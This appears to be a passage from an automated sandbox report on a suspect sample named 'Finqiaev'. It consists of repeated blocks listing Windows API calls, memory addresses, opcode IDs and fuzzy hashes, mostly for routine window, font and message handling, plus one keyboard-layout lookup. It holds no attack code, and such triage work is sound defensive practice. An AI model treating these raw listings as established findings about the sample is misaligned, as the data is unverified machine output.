                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ObjectSelect$DesktopReleaseWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1187665388-0
                                                                                                                                  • Opcode ID: 963a918b23a994248373431520c127038ce8ca7c9b4a91f43c8cb5e1b7257617
                                                                                                                                  • Instruction ID: 782a415e31a827d56fbb99ce3972f3f51450e6446e7fe7689ba56f805e84db72
                                                                                                                                  • Opcode Fuzzy Hash: 963a918b23a994248373431520c127038ce8ca7c9b4a91f43c8cb5e1b7257617
                                                                                                                                  • Instruction Fuzzy Hash: 1631E876E00219AFDB00DEEDCC85DEFBBBCAF49608B414464B544F7244D676AD048BA5
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetClassInfoA.USER32(?,?,?), ref: 040EE650
                                                                                                                                  • UnregisterClassA.USER32(?,?), ref: 040EE678
                                                                                                                                  • RegisterClassA.USER32(?), ref: 040EE68E
                                                                                                                                  • GetWindowLongA.USER32(00000000,000000F0), ref: 040EE6CA
                                                                                                                                  • GetWindowLongA.USER32(00000000,000000F4), ref: 040EE6DF
                                                                                                                                  • SetWindowLongA.USER32(00000000,000000F4,00000000), ref: 040EE6F2
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ClassLongWindow$InfoRegisterUnregister
                                                                                                                                  • String ID: @
                                                                                                                                  • API String ID: 717780171-2766056989
                                                                                                                                  • Opcode ID: c2c9ba3ada4b63c33d9bbd19b24fc656f7cc7377fa5d2152a746b4d2fb54dc81
                                                                                                                                  • Instruction ID: 43be097bc1b4e680fdfab488fa950bdf7c26b96a60572573b140837184ca5fad
                                                                                                                                  • Opcode Fuzzy Hash: c2c9ba3ada4b63c33d9bbd19b24fc656f7cc7377fa5d2152a746b4d2fb54dc81
                                                                                                                                  • Instruction Fuzzy Hash: 1D517F31A003588FEB20EB69CC44BEE77E9AF4530CF4045A9E495FB291DB35B945CB94
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetCapture.USER32 ref: 04100715
                                                                                                                                  • GetCapture.USER32 ref: 04100724
                                                                                                                                  • SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 0410072A
                                                                                                                                  • ReleaseCapture.USER32 ref: 0410072F
                                                                                                                                  • GetActiveWindow.USER32 ref: 04100780
                                                                                                                                  • SendMessageA.USER32(00000000,0000B000,00000000,00000000), ref: 04100816
                                                                                                                                  • SendMessageA.USER32(00000000,0000B001,00000000,00000000), ref: 04100883
                                                                                                                                  • GetActiveWindow.USER32 ref: 04100892
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CaptureMessageSend$ActiveWindow$Release
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 862346643-0
                                                                                                                                  • Opcode ID: 0907c7b6e5a751332e1660cf65cd00fd549a8a21c0df9eaf173e98648a8a04d2
                                                                                                                                  • Instruction ID: 22eccbc2ca86b85916d5ce228565419ab12d59df6fa4337da033206b92cc804e
                                                                                                                                  • Opcode Fuzzy Hash: 0907c7b6e5a751332e1660cf65cd00fd549a8a21c0df9eaf173e98648a8a04d2
                                                                                                                                  • Instruction Fuzzy Hash: 9D514134A40244EFEB11EF65D985BDD7BF1EF89708F1580A4E444AB291D779BE40DB40
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 040DDDCA
                                                                                                                                  • OffsetRect.USER32(?,?,?), ref: 040DDDDF
                                                                                                                                  • GetWindowLongA.USER32(00000000,000000F0), ref: 040DDE1E
                                                                                                                                  • GetSystemMetrics.USER32(00000002), ref: 040DDE33
                                                                                                                                  • GetSystemMetrics.USER32(00000003), ref: 040DDE3C
                                                                                                                                  • FillRect.USER32(?,?,00000000), ref: 040DDE86
                                                                                                                                  • ExcludeClipRect.GDI32(?,?,?,?,?,?,?,00000000,0000000F,?,000000FE,000000FE,00000003,00000002,00000000,000000F0), ref: 040DDEAB
                                                                                                                                  • ReleaseDC.USER32(00000000,?), ref: 040DDEE9
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Rect$MetricsSystemWindow$ClipExcludeFillLongOffsetRelease
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3012522431-0
                                                                                                                                  • Opcode ID: e66e972a82b288649c40070d8237c6999687847684ec2f29f1fe17088c728285
                                                                                                                                  • Instruction ID: c30b8758115b8de15b5aa71443727091a66ab931c00725d38792335b049d4e54
                                                                                                                                  • Opcode Fuzzy Hash: e66e972a82b288649c40070d8237c6999687847684ec2f29f1fe17088c728285
                                                                                                                                  • Instruction Fuzzy Hash: C341ED71A04609ABEB11EBE8CD41EEFB7BDEF89218F100561F904F7290D631BE0587A4
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • SaveDC.GDI32(?), ref: 040EFD79
                                                                                                                                  • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 040EFDB2
                                                                                                                                  • GetWindowLongA.USER32(00000000,000000EC), ref: 040EFDC6
                                                                                                                                  • GetWindowLongA.USER32(00000000,000000F0), ref: 040EFDE7
                                                                                                                                  • SetRect.USER32(?,00000000,00000000,?,?), ref: 040EFE17
                                                                                                                                  • DrawEdge.USER32(?,?,00000000,00000000), ref: 040EFE26
                                                                                                                                  • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 040EFE4F
                                                                                                                                  • RestoreDC.GDI32(?,?), ref: 040EFECE
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Rect$ClipIntersectLongWindow$DrawEdgeRestoreSave
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4023346126-0
                                                                                                                                  • Opcode ID: a42c34ad305dd0b3276438f774bdd82d9f0d444db6a95185faa5733b1debc2db
                                                                                                                                  • Instruction ID: e9832cc491fb5651d4a39d271e07c221a3e70fd1910373185a53795b9dfdf04c
                                                                                                                                  • Opcode Fuzzy Hash: a42c34ad305dd0b3276438f774bdd82d9f0d444db6a95185faa5733b1debc2db
                                                                                                                                  • Instruction Fuzzy Hash: 6441EA75A04209AFEB10DBA9C981FEEB7F9EB48308F1141A5E604FB391D635BE41CB50
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • SetWindowPos.USER32(00000000,000000FF,?,?,?,?,00000010,00000000,040F38EC), ref: 040F37ED
                                                                                                                                  • GetTickCount.KERNEL32 ref: 040F37F2
                                                                                                                                  • SystemParametersInfoA.USER32(00001016,00000000,?,00000000), ref: 040F3836
                                                                                                                                  • SystemParametersInfoA.USER32(00001018,00000000,00000000,00000000), ref: 040F384E
                                                                                                                                  • AnimateWindow.USER32(00000000,00000064,?), ref: 040F3893
                                                                                                                                  • ShowWindow.USER32(00000000,00000004,00000000,000000FF,?,?,?,?,00000010,00000000,040F38EC), ref: 040F38B6
                                                                                                                                    • Part of subcall function 040F6EC8: GetCursorPos.USER32(?), ref: 040F6ECC
                                                                                                                                  • GetTickCount.KERNEL32 ref: 040F38D3
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$CountInfoParametersSystemTick$AnimateCursorShow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3024527889-0
                                                                                                                                  • Opcode ID: 8aad14225507099fce2ce77d9664776af8a495090c8332a0920fc93ad1d53f7c
                                                                                                                                  • Instruction ID: 2eb165a8a74b0d1810f4c09617bcbc9a4cac31493e80d05471107e6133c2d4df
                                                                                                                                  • Opcode Fuzzy Hash: 8aad14225507099fce2ce77d9664776af8a495090c8332a0920fc93ad1d53f7c
                                                                                                                                  • Instruction Fuzzy Hash: 04513674A00205EFEB50DFA8C980AEEB7F5EB44318F6085A0EA00BB654D775BE41DB90
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 041054A8: GetActiveWindow.USER32 ref: 041054CF
                                                                                                                                    • Part of subcall function 041054A8: GetLastActivePopup.USER32(?), ref: 041054E1
                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 0410417E
                                                                                                                                  • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,?), ref: 041041B6
                                                                                                                                  • MessageBoxA.USER32(00000000,?,?,?), ref: 041041F5
                                                                                                                                  • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,0410426B,?,00000000,04104264), ref: 04104245
                                                                                                                                  • SetActiveWindow.USER32(00000000,0410426B,?,00000000,04104264), ref: 04104256
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$Active$LastMessagePopupRect
                                                                                                                                  • String ID: (
                                                                                                                                  • API String ID: 3456420849-3887548279
                                                                                                                                  • Opcode ID: 0de6c5c6751774a94633cb9f8735d72839d7260c6e922cc6b153b01e6b407161
                                                                                                                                  • Instruction ID: 88a1c1fcb90c5993b2a89ff9cc1276cee98c77d5b1483a425dffc25e22707a66
                                                                                                                                  • Opcode Fuzzy Hash: 0de6c5c6751774a94633cb9f8735d72839d7260c6e922cc6b153b01e6b407161
                                                                                                                                  • Instruction Fuzzy Hash: 6151C8B5A00218AFDB04DFA8DD81FAEB7F9EB89704F148465E604EB791D7B4BD008B50
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • EnumDisplayMonitors.USER32(?,?,?,?), ref: 040DB285
                                                                                                                                  • GetSystemMetrics.USER32(00000000), ref: 040DB2AA
                                                                                                                                  • GetSystemMetrics.USER32(00000001), ref: 040DB2B5
                                                                                                                                  • IntersectRect.USER32(?,?,?), ref: 040DB2FE
                                                                                                                                  • IntersectRect.USER32(?,?,?), ref: 040DB314
                                                                                                                                    • Part of subcall function 040DACA4: GetProcAddress.KERNEL32(0414A568,00000000), ref: 040DAD23
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: IntersectMetricsRectSystem$AddressDisplayEnumMonitorsProc
                                                                                                                                  • String ID: EnumDisplayMonitors
                                                                                                                                  • API String ID: 2238260564-2491903729
                                                                                                                                  • Opcode ID: 5e40bc10bb7e17d2608651601d50c8ee15a11802f4fd877ebbd0a961678247dd
                                                                                                                                  • Instruction ID: fe3c11c2baaf62f04bac328120d945d653bacacf9277c7b176acfafdda2170d2
                                                                                                                                  • Opcode Fuzzy Hash: 5e40bc10bb7e17d2608651601d50c8ee15a11802f4fd877ebbd0a961678247dd
                                                                                                                                  • Instruction Fuzzy Hash: CC312876A00209AFEB50DEA5C984AEF77FCEF89204F054526E915F3200E634F908DBA1
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetWindowLongA.USER32(00000000,000000F0), ref: 040FD161
                                                                                                                                  • GetWindowLongA.USER32(00000000,000000EC), ref: 040FD173
                                                                                                                                  • GetClassLongA.USER32(00000000,000000E6), ref: 040FD186
                                                                                                                                  • SetWindowLongA.USER32(00000000,000000F0,00000000), ref: 040FD1C6
                                                                                                                                  • SetWindowLongA.USER32(00000000,000000EC,?), ref: 040FD1DA
                                                                                                                                  • SetClassLongA.USER32(00000000,000000E6,?), ref: 040FD1EE
                                                                                                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000233,00000000,000000E6,?,00000000,000000EC,?,00000000,000000F0,00000000), ref: 040FD20A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Long$Window$Class
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2026531576-0
                                                                                                                                  • Opcode ID: a955475e008342a39e440602636dbc793ab62fdf25f557567a4f0dff511511b1
                                                                                                                                  • Instruction ID: 3676a298fd659ed35855db05d37e43e035dfc95222823ab24e0c75aa48b4a728
                                                                                                                                  • Opcode Fuzzy Hash: a955475e008342a39e440602636dbc793ab62fdf25f557567a4f0dff511511b1
                                                                                                                                  • Instruction Fuzzy Hash: BB21C330308241BAEA01A77C8C44AFEB7996FD121CF184A64F595FB6D0CB74F845D792
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 040DB0FC
                                                                                                                                  • GetSystemMetrics.USER32(00000000), ref: 040DB111
                                                                                                                                  • GetSystemMetrics.USER32(00000001), ref: 040DB11C
                                                                                                                                  • lstrcpy.KERNEL32(?,DISPLAY), ref: 040DB146
                                                                                                                                    • Part of subcall function 040DACA4: GetProcAddress.KERNEL32(0414A568,00000000), ref: 040DAD23
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: System$Metrics$AddressInfoParametersProclstrcpy
                                                                                                                                  • String ID: DISPLAY$GetMonitorInfoA
                                                                                                                                  • API String ID: 2545840971-1370492664
                                                                                                                                  • Opcode ID: 9bd52fb960d0caf2674966b3312daf12e53b1e7bc8e6322be067060988763492
                                                                                                                                  • Instruction ID: 8f3e48d4b9bbf9d39d11f35d56e449db7b7254cd9073550894bb9d2f05f36034
                                                                                                                                  • Opcode Fuzzy Hash: 9bd52fb960d0caf2674966b3312daf12e53b1e7bc8e6322be067060988763492
                                                                                                                                  • Instruction Fuzzy Hash: 541103396403049FE720CF668C447A7B7F8EF89794F424929EC55EB240D274BC88CBA0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 040DB1D0
                                                                                                                                  • GetSystemMetrics.USER32(00000000), ref: 040DB1E5
                                                                                                                                  • GetSystemMetrics.USER32(00000001), ref: 040DB1F0
                                                                                                                                  • lstrcpy.KERNEL32(?,DISPLAY), ref: 040DB21A
                                                                                                                                    • Part of subcall function 040DACA4: GetProcAddress.KERNEL32(0414A568,00000000), ref: 040DAD23
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: System$Metrics$AddressInfoParametersProclstrcpy
                                                                                                                                  • String ID: DISPLAY$GetMonitorInfoW
                                                                                                                                  • API String ID: 2545840971-2774842281
                                                                                                                                  • Opcode ID: b8d84cd9016726f998b1cb93e3d7740b673f6012d2b5d1ce0dbe43e1dca77f57
                                                                                                                                  • Instruction ID: 7dfaeb0dc58d9e18c6e9f548649c9548fe85a8caa2f7f9d973a844b0adcb52ec
                                                                                                                                  • Opcode Fuzzy Hash: b8d84cd9016726f998b1cb93e3d7740b673f6012d2b5d1ce0dbe43e1dca77f57
                                                                                                                                  • Instruction Fuzzy Hash: 1811DF366403005FD720CE659944BBBB7F8EF45755F024529EC85EB240D274B848CBA4
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,040B46CF,?,?,?,00000002,040B477A,040B2DAF,040B2DF6), ref: 040B4641
                                                                                                                                  • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,040B46CF,?,?,?,00000002,040B477A,040B2DAF,040B2DF6), ref: 040B4647
                                                                                                                                  • GetStdHandle.KERNEL32(000000F5,040B4690,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,040B46CF), ref: 040B465C
                                                                                                                                  • WriteFile.KERNEL32(00000000,000000F5,040B4690,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,040B46CF), ref: 040B4662
                                                                                                                                  • MessageBoxA.USER32(00000000,Runtime error at 00000000,0411A754,00000000), ref: 040B4680
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileHandleWrite$Message
                                                                                                                                  • String ID: Runtime error at 00000000
                                                                                                                                  • API String ID: 1570097196-1393363852
                                                                                                                                  • Opcode ID: 725b189ba9ad95b4c7c0a44aa18f60e82ca04450fc6fc227fb20176ac401b012
                                                                                                                                  • Instruction ID: 810b1b29f121557bf134f34428ed636ba29adb9a2209bf9598866185ec1dad1e
                                                                                                                                  • Opcode Fuzzy Hash: 725b189ba9ad95b4c7c0a44aa18f60e82ca04450fc6fc227fb20176ac401b012
                                                                                                                                  • Instruction Fuzzy Hash: 19F0F6706413C075FA10A7606C55FD927988B84B6CF104714B2E0BC0D287B875C48FAE
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 040CD6EF
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 040CD6FE
                                                                                                                                  • RtlEnterCriticalSection.NTDLL(0414A2EC), ref: 040CD743
                                                                                                                                  • InterlockedExchange.KERNEL32(0411AAF0,?), ref: 040CD75F
                                                                                                                                  • RtlLeaveCriticalSection.NTDLL(0414A2EC), ref: 040CD7B8
                                                                                                                                  • RtlEnterCriticalSection.NTDLL(0414A2EC), ref: 040CD827
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalSection$CurrentEnterThread$ExchangeInterlockedLeave
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1985336998-0
                                                                                                                                  • Opcode ID: ecdffe17b19374766dcf1dd27ad514c15dcf689b8843aa13fe1df2d3c8b0c641
                                                                                                                                  • Instruction ID: 78c73b847e9c6b0dfad5b78019c7f12375d3b50e05d8f0b460ff7f12530925f5
                                                                                                                                  • Opcode Fuzzy Hash: ecdffe17b19374766dcf1dd27ad514c15dcf689b8843aa13fe1df2d3c8b0c641
                                                                                                                                  • Instruction Fuzzy Hash: 8C31AF30A44644EFEB11DBA5C890EADB7E8EF49718F5188B8E800F6650E7797844DE62
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 04103E00
                                                                                                                                  • IsWindowUnicode.USER32 ref: 04103E14
                                                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 04103E35
                                                                                                                                  • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 04103E4B
                                                                                                                                  • TranslateMessage.USER32 ref: 04103ED4
                                                                                                                                  • DispatchMessageW.USER32 ref: 04103EE0
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Message$Peek$DispatchTranslateUnicodeWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4061826187-0
                                                                                                                                  • Opcode ID: 20215345d2377155f5a8e99b428e505dba780bae775f7917dc718456a911b0ea
                                                                                                                                  • Instruction ID: 0d6ee3cbad26cf57bd58f24501796cba974dde6ef6713a6f63a5e16fe4c4af1e
                                                                                                                                  • Opcode Fuzzy Hash: 20215345d2377155f5a8e99b428e505dba780bae775f7917dc718456a911b0ea
                                                                                                                                  • Instruction Fuzzy Hash: 0A21F8307083486BFA316A2C0DC1BFB96894FD2B4CF14C599FDE1A72C2DBE6B4464166
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • SystemParametersInfoA.USER32(0000001F,0000003C,?,00000000), ref: 04101D79
                                                                                                                                  • CreateFontIndirectA.GDI32(?), ref: 04101D86
                                                                                                                                  • SystemParametersInfoA.USER32(00000029,00000000,00000154,00000000), ref: 04101DC5
                                                                                                                                  • CreateFontIndirectA.GDI32(?), ref: 04101DD5
                                                                                                                                  • CreateFontIndirectA.GDI32(?), ref: 04101DEE
                                                                                                                                    • Part of subcall function 040D2518: MulDiv.KERNEL32(00000000,?,00000048), ref: 040D2525
                                                                                                                                  • GetStockObject.GDI32(0000000D), ref: 04101E14
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateFontIndirect$InfoParametersSystem$ObjectStock
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2473929816-0
                                                                                                                                  • Opcode ID: 6fed05f2b1cf9a215ccf84a4200a0a270a851855f4b2b4a83396b4d50d1aaa2e
                                                                                                                                  • Instruction ID: f2d7d959fb49c45844dc91e1aa345f8215acd77adead71e204f17f660438ac5f
                                                                                                                                  • Opcode Fuzzy Hash: 6fed05f2b1cf9a215ccf84a4200a0a270a851855f4b2b4a83396b4d50d1aaa2e
                                                                                                                                  • Instruction Fuzzy Hash: 6B31C830745204ABF765EB64C885BD933F4EF44309F4584B0A948EB285DF79BC48CB65
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 040D4258: GetObjectA.GDI32(?,00000054), ref: 040D426C
                                                                                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 040D43CE
                                                                                                                                  • SelectPalette.GDI32(?,?,00000000), ref: 040D43EF
                                                                                                                                  • RealizePalette.GDI32(?), ref: 040D43FB
                                                                                                                                  • GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 040D4412
                                                                                                                                  • SelectPalette.GDI32(?,00000000,00000000), ref: 040D443A
                                                                                                                                  • DeleteDC.GDI32(?), ref: 040D4443
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Palette$Select$BitsCompatibleCreateDeleteObjectRealize
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1221726059-0
                                                                                                                                  • Opcode ID: ca983b071dd89e302ff3ff81647a2a9af243760c58e216ec589564008954ae84
                                                                                                                                  • Instruction ID: 79131ddb5092b01bdad9be15e67c000ceb98df34f1cf515c75d9625d6068b39e
                                                                                                                                  • Opcode Fuzzy Hash: ca983b071dd89e302ff3ff81647a2a9af243760c58e216ec589564008954ae84
                                                                                                                                  • Instruction Fuzzy Hash: B9114F75E043087BEB11DBA8CC81FDEB7FCEB48608F518464B518F7280D675A9448B65
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleA.KERNEL32(comctl32.dll), ref: 04106CA4
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,ImageList_WriteEx), ref: 04106CB5
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                                  • String ID: ImageList_WriteEx$comctl32.dll$comctl32.dll
                                                                                                                                  • API String ID: 1646373207-3125200627
                                                                                                                                  • Opcode ID: 6747b36ea2d299c4b81b1f06713c9020e1b6fd2663998b0b7d5a7af0cbad24c8
                                                                                                                                  • Instruction ID: 253b84c697823a082ac9e81026b605c4957bdee026aa26eb00eddc58ab7390f4
                                                                                                                                  • Opcode Fuzzy Hash: 6747b36ea2d299c4b81b1f06713c9020e1b6fd2663998b0b7d5a7af0cbad24c8
                                                                                                                                  • Instruction Fuzzy Hash: 7221A774300240ABF710AF79DCC4AA937E9DB8174DB018468E885E77D0D7BABC50DB54
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 040D02A4: RegCloseKey.ADVAPI32(10940000,040D0180,00000001,040D0222,?,?,040D76BA,00000008,0414A374,00000048,00000000,040D775F), ref: 040D02B8
                                                                                                                                    • Part of subcall function 040D0308: RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00020019,?,00000000,040D04A2), ref: 040D0374
                                                                                                                                    • Part of subcall function 040BDC04: SetErrorMode.KERNEL32 ref: 040BDC0E
                                                                                                                                    • Part of subcall function 040BDC04: LoadLibraryA.KERNEL32(00000000,00000000,040BDC58,?,00000000,040BDC76), ref: 040BDC3D
                                                                                                                                  • GetProcAddress.KERNEL32(?,KbdLayerDescriptor), ref: 040E30C1
                                                                                                                                  • FreeLibrary.KERNEL32(?,040E30FB,?,00000000,00000000,040E313B), ref: 040E30EE
                                                                                                                                  Strings
                                                                                                                                  • KbdLayerDescriptor, xrefs: 040E30B8
                                                                                                                                  • Layout File, xrefs: 040E308D
